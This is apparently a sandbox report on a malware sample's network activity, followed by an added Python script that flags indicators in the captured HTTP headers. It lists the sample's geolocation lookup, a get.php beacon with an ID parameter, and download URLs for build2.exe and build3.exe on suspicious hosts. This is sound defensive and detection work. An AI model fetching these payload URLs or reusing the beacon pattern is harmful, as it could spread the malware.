Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
defgyma.com | 190.159.138.51 | |
cajgtus.com | 189.195.132.134 | |
api.2ip.ua | 172.67.139.220 | |
UDP Requests
Source | Destination |
---|---|
192.168.56.101:137 | 192.168.56.103:137 |
192.168.56.102:137 | 192.168.56.103:137 |
192.168.56.103:50800 | 164.124.101.2:53 |
192.168.56.103:52760 | 164.124.101.2:53 |
192.168.56.103:64894 | 164.124.101.2:53 |
192.168.56.103:137 | 192.168.56.255:137 |
192.168.56.103:49154 | 239.255.255.250:1900 |
8.8.8.8:53 | 192.168.56.103:50800 |
HTTP Requests

GET 200 https://api.2ip.ua/geo.json
REQUEST
GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
RESPONSE
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:13:56 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jEfT24k8Ry0bWWYp3QqIr2I15o4UNBjuiXkoyIot%2FsEPmUbSJMgFJyf8fH95tRaNfYPpBy662brjQx%2BfPuPcQLBhdkhY0%2FACsWmPdmekWzZS5L0WSEW%2B85BJJf%2Bj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8999566f28027c49-LAX
alt-svc: h3=":443"; ma=86400

GET 200 https://api.2ip.ua/geo.json
REQUEST
GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
RESPONSE
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:14:39 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RV%2FsZwKKLvmMqZ4%2BV0SP65Bjk6jBXoJelK9NU9JqXGxJ8BDIOAlicXNfj4n4yfsuNKkYB8IIxh3nDh5yGuyg8g14h9q0jT9Se4Dod4DbWhviGjdeV5VKr1TgSMSp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8999577c79482ed0-LAX
alt-svc: h3=":443"; ma=86400

GET 200 http://cajgtus.com/test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
REQUEST
GET /test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: cajgtus.com
RESPONSE
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:15:00 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 558
Content-Type: text/html; charset=UTF-8
Connection: close

GET 200 http://defgyma.com/dl/build2.exe
REQUEST
GET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: defgyma.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jun 2024 01:14:42 GMT
Content-Type: application/octet-stream
Content-Length: 327680
Last-Modified: Wed, 29 May 2024 17:20:03 GMT
Connection: close
ETag: "665763c3-50000"
Accept-Ranges: bytes

GET 200 http://cajgtus.com/files/1/build3.exe
REQUEST
GET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: cajgtus.com
RESPONSE
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:15:04 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT
ETag: "4ae00-6074de5a4a562"
Accept-Ranges: bytes
Content-Length: 306688
Content-Type: application/x-msdownload
Connection: close
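The HTTP exchanges above carry the indicators a responder would pull from this report: every request uses the literal User-Agent "Microsoft Internet Explorer" (a real browser, IE included, sends a "Mozilla/x.y (...)" product token), a .php endpoint is hit with a 32-hex-character pid parameter, two executables are fetched over plain HTTP, and the sample first queries a public geolocation service. The script below is an added example, not part of the sandbox report or its tooling: it re-parses the captured header lines (reproduced from the report above, abbreviated to the headers it uses, with one of the two identical geo.json requests omitted) and flags each exchange. The GEO_LOOKUP_HOSTS list and the browser User-Agent heuristic are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Header lines reproduced (abbreviated) from the report above; the
# "METHOD STATUS URL" / REQUEST / RESPONSE markers follow the report's layout.
CAPTURE = """\
GET 200 https://api.2ip.ua/geo.json
REQUEST
GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Server: cloudflare
GET 200 http://cajgtus.com/test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
REQUEST
GET /test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: cajgtus.com
RESPONSE
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Content-Length: 558
Content-Type: text/html; charset=UTF-8
GET 200 http://defgyma.com/dl/build2.exe
REQUEST
GET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: defgyma.com
RESPONSE
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 327680
GET 200 http://cajgtus.com/files/1/build3.exe
REQUEST
GET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: cajgtus.com
RESPONSE
HTTP/1.1 200 OK
Content-Length: 306688
Content-Type: application/x-msdownload
"""

SUMMARY = re.compile(r"^(?P<method>[A-Z]+) (?P<status>\d{3}) (?P<url>\S+)$")
# Heuristic (assumption): real browser User-Agents begin with a Mozilla/x.y (...) token.
BROWSER_UA = re.compile(r"^Mozilla/\d\.\d \(")
EXECUTABLE_TYPES = {"application/octet-stream", "application/x-msdownload", "application/x-dosexec"}
GEO_LOOKUP_HOSTS = {"api.2ip.ua"}  # assumption: a locally maintained list of IP/geo lookup services


@dataclass
class Exchange:
    method: str
    status: int
    url: str
    request: Dict[str, str] = field(default_factory=dict)   # lower-cased header name -> value
    response: Dict[str, str] = field(default_factory=dict)


def parse_capture(text: str) -> List[Exchange]:
    """Split the report text into exchanges; header lines go to the current REQUEST/RESPONSE dict."""
    exchanges: List[Exchange] = []
    target = None
    for line in text.splitlines():
        m = SUMMARY.match(line)
        if m:
            exchanges.append(Exchange(m["method"], int(m["status"]), m["url"]))
            target = None
        elif line == "REQUEST":
            target = exchanges[-1].request
        elif line == "RESPONSE":
            target = exchanges[-1].response
        elif target is not None and ":" in line and not line.startswith(("GET ", "HTTP/")):
            name, _, value = line.partition(":")       # first colon only: values may contain colons
            target[name.strip().lower()] = value.strip()
    return exchanges


def flag(ex: Exchange) -> List[str]:
    """Return the indicators observed in one exchange."""
    flags = []
    ua = ex.request.get("user-agent", "")
    if not BROWSER_UA.match(ua):
        flags.append(f"non-browser User-Agent {ua!r}")
    parts = urlsplit(ex.url)
    ctype = ex.response.get("content-type", "").split(";")[0].strip().lower()
    if ex.status == 200 and (ctype in EXECUTABLE_TYPES or parts.path.lower().endswith(".exe")):
        flags.append(f"executable download over {parts.scheme}")
    for name, values in parse_qs(parts.query).items():
        if any(re.fullmatch(r"[0-9A-Fa-f]{32}", v) for v in values):
            flags.append(f"32-hex-character value in query parameter {name!r}")
    if parts.hostname in GEO_LOOKUP_HOSTS:
        flags.append("public IP/geolocation lookup")
    return flags


def report(text: str) -> Dict[str, List[str]]:
    return {ex.url: flag(ex) for ex in parse_capture(text)}


def iocs(text: str) -> Tuple[List[str], List[str]]:
    """Contacted hosts and the URLs that delivered executables, for blocklisting."""
    exchanges = parse_capture(text)
    hosts = sorted({urlsplit(ex.url).hostname for ex in exchanges})
    payloads = sorted(ex.url for ex in exchanges if any(f.startswith("executable") for f in flag(ex)))
    return hosts, payloads


if __name__ == "__main__":
    for url, flags in report(CAPTURE).items():
        print(url, *("    " + f for f in flags), sep="\n")
    print(iocs(CAPTURE))
```

The User-Agent check is deliberately a positive match on the browser token rather than a blocklist of bad strings, so a second sample using a different hand-written agent string is caught the same way; the cost is that legitimate non-browser clients (updaters, curl) also surface and need allow-listing by host.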
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 (Destination Unreachable) | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49171 104.21.65.24:443 | C=US, O=Google Trust Services, CN=WE1 | CN=2ip.ua | ff:79:da:c4:72:a8:32:8f:28:1d:c9:7f:3a:b0:c3:0e:3f:7e:7e:a1 |
TLSv1 192.168.56.103:49165 104.21.65.24:443 | C=US, O=Google Trust Services, CN=WE1 | CN=2ip.ua | ff:79:da:c4:72:a8:32:8f:28:1d:c9:7f:3a:b0:c3:0e:3f:7e:7e:a1 |
Snort Alerts
No Snort Alerts